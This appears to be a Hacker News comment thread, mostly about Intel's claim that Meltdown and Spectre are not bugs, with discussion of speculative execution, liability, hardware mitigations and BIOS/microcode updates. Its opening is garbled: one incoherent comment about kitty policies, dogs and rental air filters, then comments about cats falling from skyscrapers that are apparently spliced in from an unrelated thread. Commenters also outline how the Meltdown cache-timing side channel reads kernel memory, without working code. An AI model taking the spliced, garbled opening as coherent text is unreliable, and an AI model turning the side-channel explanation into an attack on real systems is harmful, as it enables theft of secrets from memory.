Mortality rates.. Got it ,:-$ so, marketing for 7th floor Homes with kitty life policy in the service charge bill technically not the Blatant fraud I assumed, and if the building manager had run into trouble the lives of many injured kitties luckily lookalike to the residents could be the hardest sentencing hearing for any animal lover judge. English cities badly need dog license reintroduction. Asked to help a former neighbor become tramp beg court to return his dog. Second I met the man, who certainly was denied due process and on paper atrociously mistreated, he introduced the dog, unknown potential dominant bulldog mongrel, getting it to l so and lock it's jaw on his agitated arm. I passed him again, alone in rain, dog coat sodden, he was high and drunk careless no train still disgorge the fool he requires. Dogs need sorting out in London before brexit chaos


Actually not an urban legend. Veternarians in NYC have enough cats fall out of skyscrapers that they have actual data.

http://www.nytimes.com/1989/08/22/science/on-landing-like-a-...


An interesting related video: Slow Motion Flipping Cat Physics [1]

[1]: https://www.youtube.com/watch?v=RtWbpyjJqrU


Can parachutes deploy automatically safely?

I mean in cities I keep imagining much greater extent of elevation, moment we figure how. Above the smog line... I'm sure I was in 94 but 16 same place, in the middle, ugh.

Could it become unlawful to rent (Live in generally) homes without harmful particle filtration?

I'm thinking of renting out my filters just before tenant viewings, because this eliminates the obviously fresh air chill, takes out fat or any food Smell beyond the kitchen, let's a visitor smoke even..(friend closed rental dear by offering a cigarette excused by filters, it's your residence now) but from flu season to the decoration next door, the cost needs a artificial boost. Wish was a swapHN channel..


Bad in the old days, IBM used to call this "BAD": Broken As Designed.


Not a bug, but a feature.


The Register does a pretty fine job of shredding Intel's doublespeak: "We translated Intel's crap attempt to spin its way out of CPU security bug PR nightmare"

http://www.theregister.co.uk/2018/01/04/intel_meltdown_spect...


"potentially compromising security even though a system is operating exactly as it is designed to"

Sounds like a bug to me. The PR team must have had fun trying to find a way to downplay this one...


Ironically, a chip company, whom deals in ones and zeros all day long, committed a very serious logical fallacy: appealing to the common practice.

One way to interpret the statement is that the chip design which they utilized is widely available and understood by everyone in the chip community to be good chip design, thus we aren't at fault, because everyone is doing it.

To reiterate those types of arguments are a very serious logical fallacy and unsound argument called appealing to common practice.

They should fire their PR team.


This is not by or for technologists, it is by PR folks for stock-market analysts.

Far from being at risk of being fired their whole PR department is probably swelled by ranks of excruciatingly expensive corporate emergency consultants and experts paid precisely to output this kind of menial drivel.


To reiterate those types of arguments are a very serious logical fallacy and unsound argument called appealing to common practice.

How were they supposed to avoid an exploit that no one would discover for years? And exactly how is "appeal to common practice" a fallacious or unsound argument?

Exactly how much performance -- meaning, how much market share -- is Intel supposed to sacrifice to avoid the possibility of introducing unforeseen bugs?


People did discover it early on as it's inherent in the design of the chips, it just seemed unlikely at the time. Now Intel has to deal with a huge potential liability if something bad happens because of it. It was just bad business.

Also, appealing to common practice doesn't make logical sense.

Here: https://en.wikipedia.org/wiki/Appeal_to_tradition


Also, appealing to common practice doesn't make logical sense.

It is hazardous to apply logical arguments blindly in illogical contexts, such as competitive markets.

Again: mitigating all possible bugs isn't free. Exactly how much effort and expense is worthwhile, and how do you know beforehand?


For competitive markets to remain competitive, actors must receive the right disincentives. Intel reaped decades of competitive advantage by forgoing security for performance. As you said, they decided that the cost of mitigating these known vulnerabilities wasn't worth the benefit. Now it has come to light, and without due punishment, that math will skew even further toward exploitation over safety in the future.


These technologies were created at a time when it seemed to be very difficult/near impossible to exploit them for the purposes were seeing today. Of course Intel should have changed course when processor speed and newer technologies were introduced. Rather, they decided not to worry about this.


Or NSA had them do this intentionally, and thus, its not a bug :)


On an "how impractical is this CPU bug as a backdoor"-scale this one is so far off the charts it already left the building.


The example I saw didn't seem that impractical.

A malicious process allocates a 256 member array. Then it creates a conditional where the speculatively executed part writes a byte at offset array + kernel_memory_value. The speculative branch is executed but then backed out, but the byte in the array was touched so it is in cache now. Then the malicious process reads all of the members of the array and looks for one that returns much faster than expected (is in cache) and they know the value of that byte. Rinse and repeat to read the rest of the kernel memory. It's not going to give you MB/s of throughput, but it's plenty fast to read some key material or process tables or anything like that.

It's a very impressive attack. My hat is off to whomever thought it up.


I didn't read it as whether whether the attack is impractical (because it is clearly quite practical) -- the parent was questioning whether it's practical (or not) that such an attack would be "planted" as a backdoor by an agency like the NSA. The attack comes off as quite impractical for something like a plant (sensitive to e.g. compiler output, requires locally executing code to snoop is already a red flag, and the 'bug' enabling this has really been considered a feature of every mainstream CPU for like 15 years, and not considered by many to be any kind of attack vector.)

Or maybe the idea is speculative execution itself was a dream of the NSA that was Inception-planted into the brains of CPU designers in the 90s; who knows what the theory-of-the-hour is regarding 3-letter-agencies and their capabilities.

Ultimately I think what we're really learning is that guarding against things like microarchitectural attacks on contemporary superscalar, OoO CPUs is going to be an uphill battle that we didn't ever think of due to incidental complexity (among other reasons), and will serve as a new class of attacks. Who knows how long this bug class will exist; we've killed some. What's also likely is that, like most security failures in the industry, this is a result of various things like basic lack of forethought/ill considered design, as opposed to plants (3 letter agencies aren't responsible for the vast majority of security failures you see, it's simple mistakes). But peddling conspiracy theories involving them gets you upvotes, so, you know...


The Meltdown paper cites 500 KB/s average throughput when transactional memory extensions are available on the Intel CPU. It's not MB/s, but it's still pretty fast.


This will give you only memory addresses of the data in question, right?


No it gets you the contents.

The crux is:

array[value_of_kernel_memory_byte] = 1;

So it speculatively indexes into the array by the value stored at that memory address and writes the byte. Then to figure out what the value is you just have to see which element in the array is cached.


To elaborate on this, the write to the array isn't what's being read here.

array[value_of_kernel_memory_byte] = 1;

This assignment gets rolled back like it's supposed to. It's when reading the array after the rollback that the exploit measures that a read to array[value_of_kernel_memory_byte] is faster than the rest because that index is already in the cache.


Does that mean we don't need to rush to patch it?


Ignore parent, patch all systems as quickly and orderly as you can.


I replied to a comment saying "Or NSA had them do this intentionally"; my comment is not about whether this is a vulnerability, or whether exploitation is viable (it absolutely is), but rather about whether this is a viable backdoor.


I promise you NSA's machines run on Intel chips too


Yes, but then again, they could also be running with mitigations, like the HAP bit for the ME.


If they designed it like this, and it works as they designed it, is their PR spin opening them up to legal challenge? Presumbly they've just been misrepresenting what their system was capable of if they claim this wasn't news to them.

Is it a valid legal defence to say, that was just marketing lies so don't take it seriously?


> Is it a valid legal defence to say, that was just marketing lies so don't take it seriously?

There actually is a recognized defense to fraud claims along those lines. The concept is called "puffery": https://definitions.uslegal.com/p/puffery/


Well, that's true (at least for the spectre attack). It's not a bug in Intel products. It's a bug in any CPU that uses branch prediction (please correct me if I'm wrong, this is my current understanding)


The effect on Intel is far more severe than on other architectures. There were three vulnerabilities, two grouped together as "spectre" and one called "meltdown." Intel products are uniquely vulnerable to the meltdown attack, while many CPUs are vulnerable to spectre. The summary AFAIUI is that for most CPUs you can attack userspace processes with these techniques (think Javascript running in a browser), while for Intel CPUs you can also attack the kernel. Intel CPUs also seem to be somewhat easier to attack than others because of a higher-bandwidth side channel.


> Intel products are uniquely vulnerable to the meltdown attack

More precisely, there is only a PoC for Intel at this time. AMD processors are believed to not be vulnerable. Some ARM processors _are_ believed to be vulnerable.

> for most CPUs you can attack userspace processes with these techniques

Spectre can attack the kernel as well, at least according to http://www.tomshardware.com/news/meltdown-spectre-exploits-i... . It's just harder to use than meltdown.


That link no longer loads for me.

AIUI, Spectre can be used to attack the kernel, only if you can get code running in kernel-space, via, e.g. eBPF.


No, you could also find a gadget with ROP techniques. The eBPF thing in the paper was purely due to convenience of exploitation.


I think that's almost but not quite exactly right.

Spectre variant 2 attacks vulnerable indirect jump code patterns that exist in the kernel (or some other process), but doesn't require running the attacker's code.

Spectre variant 1 allows you to infer the contents of memory in the same address space, so that's the one where you'd use eBPF to attack the kernel.

Meltdown (variant 3) if I understand correctly can infer memory contents of other address spaces without relying on any assumptions about the code running in the other address space.

https://security.googleblog.com/2018/01/more-details-about-m...


> That link no longer loads for me.

Oh, right, ycombinator's URL parser is broken. I fixed the link to work around the buggy parser....


I'm curious about AMD not being vulnerable, mostly because this page: https://www.kb.cert.org/vuls/id/584653 makes me think that AMD has admitted to being vulnerable.


That page talks about both Meltdown and Spectre, as far as I can tell. AMD is vulnerable to Spectre; everyone agrees on that. According to https://www.amd.com/en/corporate/speculative-execution AMD claims it's not vulnerable to Meltdown (aka "Variant Three").


See this mailing list post https://lkml.org/lkml/2017/12/27/2


A minor correction, ARM's upcoming A75 core looks like it will be vulnerable to Meltdown too. But since it isn't intended for use on server workloads the performance impact of the fix shouldn't be very significant.


I did not realize that Intel CPU's also open up the kernel to the Spectre attack, while others don't. That's noteworthy.


"(at least for the spectre attack)"


That's like if Takata claimed it wasn't a production issue in Takata airbags, it was an issue that affected any airbag that was designed like Takata airbags.

It's a bunch of bullshit trying to dance around the fact that Intel shipped faulty products for years. The fact that other similar products may also be faulty isn't a valid excuse.


I'm not sure that calling it faulty is exactly fair. I feel like the attack is actually pretty brilliant, and has been non-obviously "vulnerable" for years.


The attack is pretty brilliant; but it's also not quite novel. Cache-timing attacks aren't new; certainly CPU suppliers should have known the general issues at hand for... at least a decade? See e.g. Colin Percival's somewhat related attack on hyperthreading way back in 2005: http://www.daemonology.net/papers/htt.pdf

Actually exploiting the information leakage isn't easy; and its compounded by the secrecy surrounding cpu internals. So I think they definitely deserve some blame here. Yes, the PoC is new. But the attack surface was widely known more than a decade ago, and they chose to punt the issue onto software; a solution that was unlikely to really hold water.


2006: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.190...

From the abstract:

> Information leakage through covert channels and side channels is becoming a serious problem, especially when these are enhanced by modern processor architecture features. We show how processor architecture features such as simultaneous multithreading, control speculation and shared caches can inadvertently accelerate such covert channels or enable new covert channels and side channels.


Hey, there you go! I kind of doubt Intel really didn't know about this risk.

They were cutting corners; that deserves some opprobrium - especially given their market-dominating position over this timespan.


The same can be said for many security vulnerabilities, but that doesn't make them any less faulty. Shellshock exploited a bug that had been in Bash for 25 years (!), but being non-obvious isn't a free pass.

I am not angry at Intel and in general think they do a good job, but trying to dodge blame here comes off sounding pathetic.


It would be like Takata claiming their airbags are not a problem because all airbags can kill infants. There is a problem that uniquely affects one manufacturer's product line, and another problem that affects many manufacturers. Intel has been shipping chips that are uniquely and more severely affected by these attacks for many years now. They were ignorant, sure, but they did have a uniquely vulnerable design.


That's like if Master Lock claimed it wasn't a production issue in Master locks, it was an issue that affected any lock that was designed like Master locks. It's a bunch of bullshit trying to dance around the fact that Master Lock shipped faulty products for years. The fact that other similar products may also be faulty isn't a valid excuse.


I mean, it's not like a Master Lock is hard to pick or shim. Good comparison ;)


IF the bug is present in all processors that use speculative execution AND Intel products use speculative execution THEN it is a bug in Intel products.

It would only be correct to say "This is not a bug or a flaw exclusive to Intel products"


My interpretation is that they not calling this a bug or a flaw, but a logical consequence of the design, and does not represent a flaw because the original specification didn't specify the implementation be resistant to this kind of attack.


A bug is a bug regardless of what the original specification mentioned.


I don't agree. If a spec leaves out details, the impelmentors are free to make reasonable decisions on how to implement it. It's more likely the spec didn't really have much to say about promises on the visible effects of speculative execution (the specs are often highly detailed about what side effects can be visible, this is a consequence of modern complex processors, which have very subtle designs).

A bug would occur in the case where the specification specified that there were no visible side effects from these mispredicted speculative executions, and the processor implementor failed to implement that part of the specification. This is a big deal because if it's a bug, Intel is liable.

It's likely all processors with these kinds of features, the specs will get updated to be more specific about these kinds of side effects.


I think the specification has a problem if a conformant implementation has a problem, particularly if it's a security one. There should be as little as possible left free to the implementors.

The KRACK attack from a couple months ago it's due to the fact the WPA2 specification was ambiguous about what values to accept. Most implementations allowed decrypting traffic and a few even hosts impersonating other hosts but they were perfectly conformant. I would say there is a flaw in the WPA2 specification.

There are always going to be unintended consequences but this one about effects of branch prediction seems, ironically, quite predictable.


Every design is a tradeoff and spec authors don't want implementators to have their hands tied fixing every last problem.


Are you saying a bug cannot exist unless some functionality is specifically mentioned in the specification, and broken in reality?


From the perspective of Intel, as well as most of the microprocessor industry, yeah. Even "broken in reality" is arguable: while this is indeed an exploit, choosing performance over security (when the resources to implement a chip are finite) is a legitimate design tradeoff.


Are you saying a bug cannot exist unless some functionality is specifically mentioned in the specification, and broken in reality?

That's a philosophical stance known as "positivism."


> If a spec leaves out details

Who do you think wrote the spec here?


system architects at intel, obviously.


Ok, so your saying Intel wrote a poor spec and implemented to that spec, so no fault of theirs because “we implemented to the spec”?


I didn't say it was no fault of theirs. But it does really matter, to Intel, and their (large-scale) customers in terms of liability.


So Intel is still liable then.


Right, so the mismatch here is whether or not the CPU is being pitched as wholly secure. If it is "mostly secure with insecure performance enhancements" or really "mostly secure with performance enhancements that have an unspecified level of security", then... It's "not a bug".

It's a huge lapse in customer trust, for sure. But if you're just going to play that semantics game...

I think the good point here is whether or not Intel engineers knew of patterns like this (they should have) and is it negligent or unethical to release products that have these vulnerabilities built in. Insecure (or "undefined") by intention or by coercion.


So it's a bug in the specification.


so it is a flaw in the spec then.


It feels like you should be able to make a version of branch prediction with speculative execution that behaves the same as the non-speculative-fo-real execution. As in accessing memory you can't actually access doesn't cause a load and does not speculatively execute further instructions with data you weren't supposed to be able to load in the first place.

This is after all what the real execution does; when you try to load from a memory address that you are not allowed to, it does not cause a memory load, it does not affect the cache and it does not continue executing instruction but instead generates a page fault. We skip the page fault thing in speculative execution, obviously, but we shouldn't continue normal control flow.

I'm sure that is a lot more difficult to implement in silicon and may end up negating the performance benefits of speculative execution, but right now it feels like not having the memory protection in place in speculative execution is a performance hack that exploded in all our faces.


In spectre, the victim process is coerced (via branch misprediction, in their first example) to speculatively access its own memory, resulting in side-effects that you can measure to determine the memory contents. No violation of memory protection needed.


But it is a bug in Intel products. Whether similarly designed products are also affected is orthogonal.


Any CPU that uses branch prediction that doesn't invalidate the cache after failure I think.


How is that supposed to work? You would have to flush the entire cache on every branch, which would mostly defeat the point of the cache in the first place.

(The exploit involves reading an off-limits location in the speculative branch, then reading a legal location based on the off-limits value; so unless the entire cache was flushed the attack would still be possible.)


Could you somehow mark cache lines that are filled by speculatively executed instructions so they only become visible to normally executed instructions when the speculative instructions are committed? I guess that would require a lot more logic and more cache tag bits.


You can then detect which addresses were loaded because they caused other cache lines to be evicted.

Even if speculative loads do not modify the cache, you could still have a side channel by analyzing the memory bus contention.

IMO there is no way to get rid of these timing attacks entirely without getting rid of SMT and speculation.


The solution may lie in a new "non-speculative load“ instruction that delays execution until preceding branches are confirmed.

This would allow keeping the performance of speculative execution in the vast majority of cases, while also fixing the kind of potentially leaking double-indirections that Spectre variant 1 can exploit.

Spectre variant 2 needs to be fixed by isolation of the branch prediction structures, i.e. tagging the BTB and others with the PCID and privilege level.


> The solution may lie in a new "non-speculative load“ instruction that delays execution until preceding branches are confirmed.

That's sadly not enough.

There are also potential speculation-based side-channels that are unrelated to cache: timing the idiv operation whose latency "depends on number of significant bits in absolute value of dividend." Furthermore there are many ways to measure contention on the execution ports which can leak information about the speculative execution.


Well, there seems to be a lot of hysteria right now. You mention speculation-based side effects in general, but keep in mind that only data-dependent side effects matter. There aren't that many of those outside the memory system, if any.

You mention idiv, which is an interesting example. Is it actually observable? Without hyper-threading, almost certainly not, because the execution unit reservations should be dropped as soon as the speculated branch is resolved. With hyper-threading? Perhaps, but it shouldn't be too hard to fix if a non-speculated thread always takes precedence over a speculated one, which makes sense anyway.

In both cases there may be leaks in practice, but those should be fixable relatively easily in hardware, and we've already established that hardware fixes are required anyway.

Another case to think about are dependent conditional branches, since those could affect the instruction cache.

It does seem like a good idea to have a strict barrier instruction against speculative execution just to have a fallback mitigation.


It wouldn't just require more cache tag bits, you would have to hold the old data somewhere and be able to read that with zero extra delay.

Because eviction is a side-channel too.


They are saying this to protect future products that are too late to update. A flaw must be fixed. This thing will exist in near-future chips for years until they redesign. So lomg as they can call it a software issue they need not stop production.


Does this mean it was deliberately designed to be insecure to gain some performance?

With each day passing this looks more and more like the Diesel scandal. Is it OK if all big players do it?


" even though a system is operating exactly as it is designed to."

So people can leverage the poopy design of your chip to steal compromising information? And it's okay because the chip is functioning as it should?

It shows how deeply embedded the idea of maintaining proper design and processes is over, going back to the drawing board and designing a secure chip.


So people can leverage the shitty design of your lock to steal goods? And it's okay because the lock is functioning as it should? It shows how deeply embedded the idea of maintaining proper design and processes is over, going back to the drawing board and designing a secure lock.


It's an interesting debate. But it's clear in the statement they provided, that they are laser focused on design above all else.

Literally, prioritize proper design over security and maybe even performance in some cases. Which is interesting because you'd figure at some point, the customer would be considered in the design.

Like are Intel chips designed by robots or something?


So people can leverage the shitty design of your lock to steal goods? And it's okay because the lock is functioning as it should?

That's how Master Lock stays in business.


Movie Theatre is good one.

Our service works just ask expected without any flaws. Our ushers check for proper tickets after the presentation has finished, that way we know who should and should not have access to the theatre.

But shouldn't you check before hand?

Again our service works ...


I read this as saying "our lawyers do not want us to preemptively strengthen the case for legal liability for damages", and as being completely independent of plans for mitigation or future product changes.


And now people have found (made?) two workarounds for those hardware design specifications: Spectre and Meltdown.

So people made workarounds for those two workarounds: software patches.

Maybe even more other people will find (or make?) workarounds for those software patches?

Will we witness an semi-endless cycle of workarounds until the current design specifications are slowly becoming worthless?

Or will we suddenly witness new updated (patched?) design specifications (with some extra free features we never knew we wanted) and all buy new hardware?


> This is not a bug or a flaw in Intel products. . .[the] system is operating exactly as it is designed to.

So Intel has learned nothing and will be prone to similar mistakes in the future.


Fingers crossed for new CEO?


This ridiculous double-speak is just their lawyers attempting to minimize exposure to claims for replacement processors due to not performing to specifications.


I find it very interesting that most of their official communication on this matter seems to be for their shareholders rather than the people who are directly impacted by using their products, as if they already completely gave up on the latter. Or maybe they think we wouldn't see through this bullshit PR speak, in which case I feel quite insulted.


So what they're saying is that it was designed with a fault from the beginning. Or maybe we are just using it wrong?


I would imagine trying to preempt class actions.


I read this in HAL's voice


Actually, it’s a feature.


Dear Intel, dont worry, this will be court tested.

And btw, did you notice that huge amount of people disagrees already with you, simply putting your stock 8% down in two days?


The majority of the people putting the stock value down have no clue how bad this is: they are just making a bet (and many of them will make a lot of money even if this turns out to be an elaborate hoax). Sure a lot of people disagree, but if you read all the threads here you can quickly get a sense that among people who have a clue what this means on a technical level (those who real hacker news) don't agree how bad it is.


What if the court is in the same pocket as Intel?


Lenovo has BIOS updates that specifically mention CVE-2017-5715 (Spectre). I wonder if this is an Intel microcode update.

https://pcsupport.lenovo.com/de/en/products/laptops-and-netb...


For those like me are running Linux and asking how to update the BIOS, lenovo provides a ISO file. Quoting from [1]:

"The BIOS Update CD can boot the computer disregarding the operating systems and update the UEFI BIOS (including system program and Embedded Controller program) stored in the ThinkPad computer to fix problems, add new functions, or expand functions as noted below."

[1]: https://support.lenovo.com/fr/en/downloads/ds120430


Yeah, basically all BIOS have that. Some simply need a FAT usb key inserted with a specifically-named file that the BIOS looks for instead of a "true" bootable media.


I wonder what this means (if anything) for machines running Coreboot.


And how do I get these firmware updates and microcode updates on Windows?

Checking AsRock, there aren't any Bios updates.

Also:

> Customers who only install the Windows January 2018 security updates will not receive the benefit of all known protections against the vulnerabilities. In addition to installing the January security updates, a processor microcode, or firmware, update is required. This should be available through your device manufacturer. Surface customers will receive a microcode update via Windows update.

From:

https://support.microsoft.com/en-gb/help/4073119/windows-cli...

(There is also a powershell script to check if you are protected fully or not)


"This should be available through your device manufacturer."

I'm not holding my breath.


Microcode updates are distributed via Windows update.


But Microsoft says they are not:

>In addition to installing the January security updates, a processor microcode, or firmware, update is required. This should be available through your device manufacturer. Surface customers will receive a microcode update via Windows update.

https://support.microsoft.com/en-gb/help/4073119/windows-cli...


If the microcode update requires motherboard vendors to issue BIOS updates we are all doomed.


This appears to be the case at least on my Windows 10 laptop.

I've installed the hotfix for Windows, but when I run the PowerShell script to determine whether mitigation is active, the script tells me that it's not active, due to lack of hardware support. The script then goes on to give the recommendation to "Install BIOS/firmware update provided by your device OEM that enables hardware support for the branch target injection mitigation."

It's a 1-year-old ASUS laptop and I would be surprised if they even give a sane response to my question to their technical support (I doubt they will even know what I'm talking about).


"Dear OEM Vendor Technical Support,

There has been recent news about critical security issues in Intel CPUs, requiring a firmware update for all laptops and motherboards with Intel chips.

The vulnerabilities include the potential for malicious websites to read sensitive system memory, including passwords and encryption keys.

I have model XXYY-ZZZZ, do you have any information on when an update will be available, and where I can access it?

If not, can you attempt to escalate this ticket? The security issues are starting making their rounds in the news, and more information can be found at https://meltdownattack.com

Thank you, and happy new year :)"

Seems like it might be worth a shot.


"Dear usr frend,

thx for ur interst in our product. our team will reach u. we have many new products. hope u have great new year!

- OEM volume sales"


Thanks! I will use this if they don't understand my version of it.


I saw the same thing on my Lenovo laptop: installed the Windows update, the PowerShell scripts said it's missing HW support. Installed a new BIOS update from Lenovo (released two weeks ago, btw), now the PS script says I have the needed HW support and is now protected. So on this laptop, the needed microcode appears to have come from a new BIOS and not via Windows.

I have another Gigabyte MB that I suspect is too old for BIOS updates anymore so I am really hoping that at some point these microcode updates due come through Windows and not just via BIOS updates.


Same here with 1-year old HP laptop.


Somehow I doubt Sony's going to be updating the BIOS for this VAIO laptop I'm typing this on, given that the last update was in 2012... and they don't even make computers anymore.


There are a variety of examples of Microcode updates referenced on support.microsoft.com (here's just one):

https://support.microsoft.com/en-us/help/3064209/june-2015-i...

...so I suspect this is just a standard disclaimer.

Generally, microcode updates are distributed with the OS or OS distribution.


Microcode updates come as normal Windows updates.

More

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: